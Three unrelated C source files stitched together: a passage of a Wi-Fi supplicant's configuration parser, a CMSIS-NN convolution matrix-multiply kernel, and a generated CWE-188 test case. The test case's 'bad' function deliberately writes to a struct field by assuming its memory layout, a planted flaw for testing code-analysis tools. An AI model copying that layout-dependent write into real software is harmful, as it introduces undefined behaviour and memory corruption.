*/ while (*pos) { op_class = atoi(pos); pos2 = os_strchr(pos, ':'); if (pos2 == NULL) goto fail; pos2++; chan = atoi(pos2); n = os_realloc_array(pref, num + 1, sizeof(struct p2p_channel)); if (n == NULL) goto fail; pref = n; pref[num].op_class = op_class; pref[num].chan = chan; num++; pos = os_strchr(pos2, ','); if (pos == NULL) break; pos++; } os_free(config->p2p_pref_chan); config->p2p_pref_chan = pref; config->num_p2p_pref_chan = num; wpa_hexdump(MSG_DEBUG, "P2P: Preferred class/channel pairs", (u8 *) config->p2p_pref_chan, config->num_p2p_pref_chan * sizeof(struct p2p_channel)); return 0; fail: os_free(pref); wpa_printf(MSG_ERROR, "Line %d: Invalid p2p_pref_chan list", line); return -1; } static int wpa_config_process_p2p_no_go_freq( const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { int ret; ret = freq_range_list_parse(&config->p2p_no_go_freq, pos); if (ret < 0) { wpa_printf(MSG_ERROR, "Line %d: Invalid p2p_no_go_freq", line); return -1; } wpa_printf(MSG_DEBUG, "P2P: p2p_no_go_freq with %u items", config->p2p_no_go_freq.num); return 0; } #endif /* CONFIG_P2P */ static int wpa_config_process_hessid( const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { if (hwaddr_aton2(pos, config->hessid) < 0) { wpa_printf(MSG_ERROR, "Line %d: Invalid hessid '%s'", line, pos); return -1; } return 0; } static int wpa_config_process_sae_groups( const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { int *groups = wpa_config_parse_int_array(pos); if (groups == NULL) { wpa_printf(MSG_ERROR, "Line %d: Invalid sae_groups '%s'", line, pos); return -1; } os_free(config->sae_groups); config->sae_groups = groups; return 0; } static int wpa_config_process_ap_vendor_elements( const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { struct wpabuf *tmp; int len = os_strlen(pos) / 2; u8 *p; if (!len) { wpa_printf(MSG_ERROR, "Line %d: invalid ap_vendor_elements", line); return -1; } tmp = wpabuf_alloc(len); if (tmp) { p = wpabuf_put(tmp, len); if (hexstr2bin(pos, p, len)) { wpa_printf(MSG_ERROR, "Line %d: invalid " "ap_vendor_elements", line); wpabuf_free(tmp); return -1; } wpabuf_free(config->ap_vendor_elements); config->ap_vendor_elements = tmp; } else { wpa_printf(MSG_ERROR, "Cannot allocate memory for " "ap_vendor_elements"); return -1; } return 0; } #ifdef CONFIG_CTRL_IFACE static int wpa_config_process_no_ctrl_interface( const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { wpa_printf(MSG_DEBUG, "no_ctrl_interface -> ctrl_interface=NULL"); os_free(config->ctrl_interface); config->ctrl_interface = NULL; return 0; } #endif /* CONFIG_CTRL_IFACE */ #ifdef OFFSET #undef OFFSET #endif /* OFFSET */ /* OFFSET: Get offset of a variable within the wpa_config structure */ #define OFFSET(v) ((void *) &((struct wpa_config *) 0)->v) #define FUNC(f) #f, wpa_config_process_ ## f, OFFSET(f), NULL, NULL #define FUNC_NO_VAR(f) #f, wpa_config_process_ ## f, NULL, NULL, NULL #define _INT(f) #f, wpa_global_config_parse_int, OFFSET(f) #define INT(f) _INT(f), NULL, NULL #define INT_RANGE(f, min, max) _INT(f), (void *) min, (void *) max #define _STR(f) #f, wpa_global_config_parse_str, OFFSET(f) #define STR(f) _STR(f), NULL, NULL #define STR_RANGE(f, min, max) _STR(f), (void *) min, (void *) max #define BIN(f) #f, wpa_global_config_parse_bin, OFFSET(f), NULL, NULL #define IPV4(f) #f, wpa_global_config_parse_ipv4, OFFSET(f), NULL, NULL static 
const struct global_parse_data global_fields[] = { #ifdef CONFIG_CTRL_IFACE { STR(ctrl_interface), 0 }, { FUNC_NO_VAR(no_ctrl_interface), 0 }, { STR(ctrl_interface_group), 0 } /* deprecated */, #endif /* CONFIG_CTRL_IFACE */ #ifdef CONFIG_MACSEC { INT_RANGE(eapol_version, 1, 3), 0 }, #else /* CONFIG_MACSEC */ { INT_RANGE(eapol_version, 1, 2), 0 }, #endif /* CONFIG_MACSEC */ { INT(ap_scan), 0 }, { FUNC(bgscan), 0 }, { INT(disable_scan_offload), 0 }, { INT(fast_reauth), 0 }, { STR(opensc_engine_path), 0 }, { STR(pkcs11_engine_path), 0 }, { STR(pkcs11_module_path), 0 }, { STR(openssl_ciphers), 0 }, { STR(pcsc_reader), 0 }, { STR(pcsc_pin), 0 }, { INT(external_sim), 0 }, { STR(driver_param), 0 }, { INT(dot11RSNAConfigPMKLifetime), 0 }, { INT(dot11RSNAConfigPMKReauthThreshold), 0 }, { INT(dot11RSNAConfigSATimeout), 0 }, #ifndef CONFIG_NO_CONFIG_WRITE { INT(update_config), 0 }, #endif /* CONFIG_NO_CONFIG_WRITE */ { FUNC_NO_VAR(load_dynamic_eap), 0 }, #ifdef CONFIG_WPS { FUNC(uuid), CFG_CHANGED_UUID }, { STR_RANGE(device_name, 0, 32), CFG_CHANGED_DEVICE_NAME }, { STR_RANGE(manufacturer, 0, 64), CFG_CHANGED_WPS_STRING }, { STR_RANGE(model_name, 0, 32), CFG_CHANGED_WPS_STRING }, { STR_RANGE(model_number, 0, 32), CFG_CHANGED_WPS_STRING }, { STR_RANGE(serial_number, 0, 32), CFG_CHANGED_WPS_STRING }, { FUNC(device_type), CFG_CHANGED_DEVICE_TYPE }, { FUNC(os_version), CFG_CHANGED_OS_VERSION }, { STR(config_methods), CFG_CHANGED_CONFIG_METHODS }, { INT_RANGE(wps_cred_processing, 0, 2), 0 }, { FUNC(wps_vendor_ext_m1), CFG_CHANGED_VENDOR_EXTENSION }, #endif /* CONFIG_WPS */ #ifdef CONFIG_P2P { FUNC(sec_device_type), CFG_CHANGED_SEC_DEVICE_TYPE }, { INT(p2p_listen_reg_class), 0 }, { INT(p2p_listen_channel), 0 }, { INT(p2p_oper_reg_class), CFG_CHANGED_P2P_OPER_CHANNEL }, { INT(p2p_oper_channel), CFG_CHANGED_P2P_OPER_CHANNEL }, { INT_RANGE(p2p_go_intent, 0, 15), 0 }, { STR(p2p_ssid_postfix), CFG_CHANGED_P2P_SSID_POSTFIX }, { INT_RANGE(persistent_reconnect, 0, 1), 0 }, { INT_RANGE(p2p_intra_bss, 0, 1), CFG_CHANGED_P2P_INTRA_BSS }, { INT(p2p_group_idle), 0 }, { INT_RANGE(p2p_passphrase_len, 8, 63), CFG_CHANGED_P2P_PASSPHRASE_LEN }, { FUNC(p2p_pref_chan), CFG_CHANGED_P2P_PREF_CHAN }, { FUNC(p2p_no_go_freq), CFG_CHANGED_P2P_PREF_CHAN }, { INT_RANGE(p2p_add_cli_chan, 0, 1), 0 }, { INT_RANGE(p2p_optimize_listen_chan, 0, 1), 0 }, { INT(p2p_go_ht40), 0 }, { INT(p2p_go_vht), 0 }, { INT(p2p_disabled), 0 }, { INT(p2p_no_group_iface), 0 }, { INT_RANGE(p2p_ignore_shared_freq, 0, 1), 0 }, { IPV4(ip_addr_go), 0 }, { IPV4(ip_addr_mask), 0 }, { IPV4(ip_addr_start), 0 }, { IPV4(ip_addr_end), 0 }, #endif /* CONFIG_P2P */ { FUNC(country), CFG_CHANGED_COUNTRY }, { INT(bss_max_count), 0 }, { INT(bss_expiration_age), 0 }, { INT(bss_expiration_scan_count), 0 }, { INT_RANGE(filter_ssids, 0, 1), 0 }, { INT_RANGE(filter_rssi, -100, 0), 0 }, { INT(max_num_sta), 0 }, { INT_RANGE(disassoc_low_ack, 0, 1), 0 }, #ifdef CONFIG_HS20 { INT_RANGE(hs20, 0, 1), 0 }, #endif /* CONFIG_HS20 */ { INT_RANGE(interworking, 0, 1), 0 }, { FUNC(hessid), 0 }, { INT_RANGE(access_network_type, 0, 15), 0 }, { INT_RANGE(pbc_in_m1, 0, 1), 0 }, { STR(autoscan), 0 }, { INT_RANGE(wps_nfc_dev_pw_id, 0x10, 0xffff), CFG_CHANGED_NFC_PASSWORD_TOKEN }, { BIN(wps_nfc_dh_pubkey), CFG_CHANGED_NFC_PASSWORD_TOKEN }, { BIN(wps_nfc_dh_privkey), CFG_CHANGED_NFC_PASSWORD_TOKEN }, { BIN(wps_nfc_dev_pw), CFG_CHANGED_NFC_PASSWORD_TOKEN }, { STR(ext_password_backend), CFG_CHANGED_EXT_PW_BACKEND }, { INT(p2p_go_max_inactivity), 0 }, { INT_RANGE(auto_interworking, 0, 1), 0 }, { 
INT(okc), 0 }, { INT(pmf), 0 }, { FUNC(sae_groups), 0 }, { INT(dtim_period), 0 }, { INT(beacon_int), 0 }, { FUNC(ap_vendor_elements), 0 }, { INT_RANGE(ignore_old_scan_res, 0, 1), 0 }, { FUNC(freq_list), 0 }, { INT(scan_cur_freq), 0 }, { INT(sched_scan_interval), 0 }, { INT(tdls_external_control), 0}, { STR(osu_dir), 0 }, { STR(wowlan_triggers), 0 }, { INT(p2p_search_delay), 0}, { INT(mac_addr), 0 }, { INT(rand_addr_lifetime), 0 }, { INT(preassoc_mac_addr), 0 }, }; #undef FUNC #undef _INT #undef INT #undef INT_RANGE #undef _STR #undef STR #undef STR_RANGE #undef BIN #undef IPV4 #define NUM_GLOBAL_FIELDS ARRAY_SIZE(global_fields) int wpa_config_process_global(struct wpa_config *config, char *pos, int line) { size_t i; int ret = 0; for (i = 0; i < NUM_GLOBAL_FIELDS; i++) { const struct global_parse_data *field = &global_fields[i]; size_t flen = os_strlen(field->name); if (os_strncmp(pos, field->name, flen) != 0 || pos[flen] != '=') continue; if (field->parser(field, config, line, pos + flen + 1)) { wpa_printf(MSG_ERROR, "Line %d: failed to " "parse '%s'.", line, pos); ret = -1; } if (field->changed_flag == CFG_CHANGED_NFC_PASSWORD_TOKEN) config->wps_nfc_pw_from_config = 1; config->changed_parameters |= field->changed_flag; break; } if (i == NUM_GLOBAL_FIELDS) { #ifdef CONFIG_AP if (os_strncmp(pos, "wmm_ac_", 7) == 0) { char *tmp = os_strchr(pos, '='); if (tmp == NULL) { if (line < 0) return -1; wpa_printf(MSG_ERROR, "Line %d: invalid line " "'%s'", line, pos); return -1; } *tmp++ = '\0'; if (hostapd_config_wmm_ac(config->wmm_ac_params, pos, tmp)) { wpa_printf(MSG_ERROR, "Line %d: invalid WMM " "AC item", line); return -1; } } #endif /* CONFIG_AP */ if (line < 0) return -1; wpa_printf(MSG_ERROR, "Line %d: unknown global field '%s'.", line, pos); ret = -1; } return ret; }
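/*
 * Usage sketch (an addition, not upstream hostap code): how a caller would
 * typically drive the parser above. example_load_globals() and the literal
 * option strings are hypothetical; real callers pass lines read from
 * wpa_supplicant.conf or received over the control interface.
 */
static int example_load_globals(struct wpa_config *config)
{
	/* The buffers must be writable: the wmm_ac_* branch above splits
	 * the string in place at the '=' sign. */
	char opt1[] = "ap_scan=1";
	char opt2[] = "country=DE";

	if (wpa_config_process_global(config, opt1, 1) < 0)
		return -1;
	return wpa_config_process_global(config, opt2, 2);
}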
292899.c
/* * Copyright (C) 2010-2018 Arm Limited or its affiliates. All rights reserved. * * SPDX-License-Identifier: Apache-2.0 * * Licensed under the Apache License, Version 2.0 (the License); you may * not use this file except in compliance with the License. * You may obtain a copy of the License at * * www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an AS IS BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /* ---------------------------------------------------------------------- * Project: CMSIS NN Library * Title: arm_nn_mat_mult_kernel_q7_q15_reordered.c * Description: Matrix-multiplication function for convolution with reordered columns * * $Date: 17. January 2018 * $Revision: V.1.0.0 * * Target Processor: Cortex-M cores * -------------------------------------------------------------------- */ #include "arm_nnfunctions.h" #include "arm_math.h" /** * @brief Matrix-multiplication function for convolution with re-ordered input. * * @details Refer to header file for details. * */ q7_t *arm_nn_mat_mult_kernel_q7_q15_reordered(const q7_t * pA, const q15_t * pInBuffer, const uint16_t ch_im_out, const uint16_t numCol_A, const uint16_t bias_shift, const uint16_t out_shift, const q7_t * bias, q7_t * pOut) { #if defined (ARM_MATH_DSP) /* set up the second output pointers */ q7_t *pOut2 = pOut + ch_im_out; int i; /* this loop over rows in A */ for (i = 0; i < ch_im_out; i += 2) { /* setup pointers for B */ const q15_t *pB = pInBuffer; const q15_t *pB2 = pB + numCol_A; /* align the second pointer for A */ const q7_t *pA2 = pA + numCol_A; /* init the sum with bias */ q31_t sum = ((q31_t)(bias[i]) << bias_shift) + NN_ROUND(out_shift); q31_t sum2 = ((q31_t)(bias[i]) << bias_shift) + NN_ROUND(out_shift); q31_t sum3 = ((q31_t)(bias[i + 1]) << bias_shift) + NN_ROUND(out_shift); q31_t sum4 = ((q31_t)(bias[i + 1]) << bias_shift) + NN_ROUND(out_shift); uint16_t colCnt = numCol_A >> 2; /* accumulate over the vector */ while (colCnt) { q31_t inA11, inA12, inA21, inA22; q31_t inB1 = *__SIMD32(pB)++; q31_t inB2 = *__SIMD32(pB2)++; pA = read_and_pad_reordered(pA, &inA11, &inA12); pA2 = read_and_pad_reordered(pA2, &inA21, &inA22); sum = __SMLAD(inA11, inB1, sum); sum2 = __SMLAD(inA11, inB2, sum2); sum3 = __SMLAD(inA21, inB1, sum3); sum4 = __SMLAD(inA21, inB2, sum4); inB1 = *__SIMD32(pB)++; inB2 = *__SIMD32(pB2)++; sum = __SMLAD(inA12, inB1, sum); sum2 = __SMLAD(inA12, inB2, sum2); sum3 = __SMLAD(inA22, inB1, sum3); sum4 = __SMLAD(inA22, inB2, sum4); colCnt--; } /* while over colCnt */ colCnt = numCol_A & 0x3; while (colCnt) { q7_t inA1 = *pA++; q15_t inB1 = *pB++; q7_t inA2 = *pA2++; q15_t inB2 = *pB2++; sum += inA1 * inB1; sum2 += inA1 * inB2; sum3 += inA2 * inB1; sum4 += inA2 * inB2; colCnt--; } /* while over colCnt */ *pOut++ = (q7_t) __SSAT((sum >> out_shift), 8); *pOut++ = (q7_t) __SSAT((sum3 >> out_shift), 8); *pOut2++ = (q7_t) __SSAT((sum2 >> out_shift), 8); *pOut2++ = (q7_t) __SSAT((sum4 >> out_shift), 8); /* skip the row computed with A2 */ pA += numCol_A; } /* for over ch_im_out */ pOut += ch_im_out; /* return the new output pointer with offset */ return pOut; #else /* To be completed */ return NULL; #endif /* ARM_MATH_DSP */ }
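/*
 * Reference sketch (an addition, not part of the CMSIS-NN sources): the
 * arithmetic the DSP kernel above performs, written as plain scalar C for a
 * single input column and non-reordered weights. It documents only the
 * bias/rounding/shift/saturation chain, not the 2x2 blocking or the 4-way
 * reordered weight access pattern.
 */
#if defined (ARM_MATH_DSP)
static void example_reference_matmult(const q7_t * A, const q15_t * B,
                                      const uint16_t ch_im_out,
                                      const uint16_t numCol_A,
                                      const uint16_t bias_shift,
                                      const uint16_t out_shift,
                                      const q7_t * bias, q7_t * pOut)
{
    int i, k;
    for (i = 0; i < ch_im_out; i++)
    {
        /* same initialization as the kernel: shifted bias plus rounding term */
        q31_t sum = ((q31_t)(bias[i]) << bias_shift) + NN_ROUND(out_shift);
        for (k = 0; k < numCol_A; k++)
        {
            sum += A[i * numCol_A + k] * B[k];
        }
        /* shift back and saturate to the signed 8-bit output range */
        pOut[i] = (q7_t) __SSAT((sum >> out_shift), 8);
    }
}
#endif /* ARM_MATH_DSP */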
195432.c
/* TEMPLATE GENERATED TESTCASE FILE Filename: CWE188_Reliance_On_Data_Memory_Layout__modify_local_18.c Label Definition File: CWE188_Reliance_On_Data_Memory_Layout.label.xml Template File: point-flaw-18.tmpl.c */ /* * @description * CWE: 188 Reliance on Data Memory Layout * Sinks: modify_local * GoodSink: Modify the second field of the struct using the field name * BadSink : Attempt to modify second field in struct, assuming the first field is an int * Flow Variant: 18 Control flow: goto statements * * */ #include "std_testcase.h" #ifndef OMITBAD void CWE188_Reliance_On_Data_Memory_Layout__modify_local_18_bad() { goto sink; /* INCIDENTAL: CWE 561 Dead Code, the code below will never run */ { struct { char first; int second; } s; s.first = 1; /* FIX: Do not make unwarranted assumptions about underlying data model * Modify and access data appropriately */ s.second = 5; printIntLine(s.first); printIntLine(s.second); } sink: { struct { char first; int second; } s; char *c; s.first = 1; c = &s.first; /* FLAW: Attempt to modify 'second' assuming second comes after first and * is aligned on an int-boundary after first */ *(int*)(c + sizeof(int)) = 5; printIntLine(s.first); printIntLine(s.second); } } #endif /* OMITBAD */ #ifndef OMITGOOD /* good1() reverses the blocks on the goto statement */ static void good1() { goto sink; /* INCIDENTAL: CWE 561 Dead Code, the code below will never run */ { struct { char first; int second; } s; char *c; s.first = 1; c = &s.first; /* FLAW: Attempt to modify 'second' assuming second comes after first and * is aligned on an int-boundary after first */ *(int*)(c + sizeof(int)) = 5; printIntLine(s.first); printIntLine(s.second); } sink: { struct { char first; int second; } s; s.first = 1; /* FIX: Do not make unwarranted assumptions about underlying data model * Modify and access data appropriately */ s.second = 5; printIntLine(s.first); printIntLine(s.second); } } void CWE188_Reliance_On_Data_Memory_Layout__modify_local_18_good() { good1(); } #endif /* OMITGOOD */ /* Below is the main(). It is only used when building this testcase on its own for testing or for building a binary to use in testing binary analysis tools. It is not used when compiling all the testcases as one application, which is how source code analysis tools are tested. */ #ifdef INCLUDEMAIN int main(int argc, char * argv[]) { /* seed randomness */ srand( (unsigned)time(NULL) ); #ifndef OMITGOOD printLine("Calling good()..."); CWE188_Reliance_On_Data_Memory_Layout__modify_local_18_good(); printLine("Finished good()"); #endif /* OMITGOOD */ #ifndef OMITBAD printLine("Calling bad()..."); CWE188_Reliance_On_Data_Memory_Layout__modify_local_18_bad(); printLine("Finished bad()"); #endif /* OMITBAD */ return 0; } #endif
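/* Supplementary sketch (an addition, not part of the generated testcase):
 * the BadSink assumes 'second' starts exactly sizeof(int) bytes after
 * 'first', but the compiler may insert any amount of padding between the
 * two fields. When byte-level access is genuinely required, offsetof()
 * from <stddef.h> reports the layout the compiler actually chose. */
#include <stddef.h>

struct CWE188_example_struct
{
    char first;
    int second;
};

static void CWE188_example_safe_byte_access(struct CWE188_example_struct *s)
{
    char *c = (char *)s;
    /* offsetof() accounts for whatever padding this compiler inserted */
    *(int *)(c + offsetof(struct CWE188_example_struct, second)) = 5;
}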